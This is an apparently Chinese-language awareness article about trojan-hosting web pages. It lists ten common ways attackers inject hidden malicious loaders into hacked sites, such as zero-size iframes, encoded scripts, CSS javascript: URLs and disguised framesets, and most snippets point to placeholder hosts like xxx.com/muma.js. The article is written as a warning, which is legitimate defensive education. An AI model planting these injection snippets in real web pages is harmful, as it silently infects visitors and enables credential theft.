如今網(wǎng)民上網(wǎng)可算是提心吊膽，面對病毒，也許殺毒軟件還能防止一二，但如果遇到網(wǎng)頁中掛馬行為，甚至直接將用戶當(dāng)前機(jī)所安裝的殺毒軟件直接強(qiáng)行關(guān)閉，那么其后果是不言而喻的。如今的網(wǎng)頁有馬行為也不像以前那么單一，甚至不出現(xiàn)下載提示，直接從后臺開始下載運行其馬，然后秘密的收集用戶信息并返潰到惡意者手中。
    網(wǎng)馬危害
    如果一臺正常的網(wǎng)絡(luò)服務(wù)器被惡意用戶入侵，其網(wǎng)頁被掛馬，在一定程度上可以說是網(wǎng)頁被篡改，其危害是巨大的，隨著用戶訪問流量的增多，會造成此馬的傳播性越發(fā)增大，由于其隱蔽性比較強(qiáng)，導(dǎo)至很多殺毒軟件沒有及時更新的用戶在不知不覺中深受其害。對于服務(wù)器而言，其一方面是帶寬與系統(tǒng)資源的占用巨大，另一方面直接導(dǎo)致該服務(wù)器成為木馬傳播之源，成為傀儡幫兇，嚴(yán)重影響到網(wǎng)站的信譽(yù)。而對于受害網(wǎng)民來說，個人資料信息的安全將成為公眾目標(biāo)，其電子銀行帳戶和密碼、游戲帳號和密碼、郵箱帳戶和密碼、QQ/MSN 帳號和密碼等都不再安全。

    常見掛馬手段
    目前，利用網(wǎng)頁木馬進(jìn)行攻擊已經(jīng)成為流行的惡意用戶攻擊手段，應(yīng)引起廣大網(wǎng)民與網(wǎng)站的足夠重視！下面列出網(wǎng)頁掛馬的幾中常見類型：

    一、body掛馬：<body ></body>

    二、框架掛馬：<iframe src=地址 width=0 height=0></iframe>

    三、js變形加密： <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>muma.txt可改成任意后綴。

    四、css中掛馬：body {background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

    五、隱蔽掛馬：top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.xxx.com/muma.htm/"></iframe>'

    六、js文件掛馬： 首先將以下代碼document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js， 則JS掛馬代碼為<script language=javascript src=xxx.js></script>

    七、圖片偽裝：
    <html>
    <iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
    <img src="圖片地址"></center>
    </html>

    八、javascript掛馬：
    <SCRIPT language=javascript> 
    window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
    </script>

    九、偽裝調(diào)用：
    <frameset rows="444,0" cols="*">
    <frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
    <frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
    </frameset>

    十、高級欺騙：
    <a  > 頁面要顯示的內(nèi)容 </a>
    <SCRIPT Language="JavaScript">
    function www_163_com ()
    {
    var url="網(wǎng)馬地址";
    open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,
    resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
    }

    以上幾中雖然列出了常見的網(wǎng)頁木馬駐扎方式，但隨著時間的推移，這些掛馬方式將會演變成各種各樣的形態(tài)，旨在盜取不同的機(jī)密與鏈接惡意用戶指定的木馬載有頁，以達(dá)下載更多的木馬病毒霍亂被感染的計算機(jī)，讓其成為新的病毒木馬載體源，從而為新一輪的感染創(chuàng)造條件。

最新評論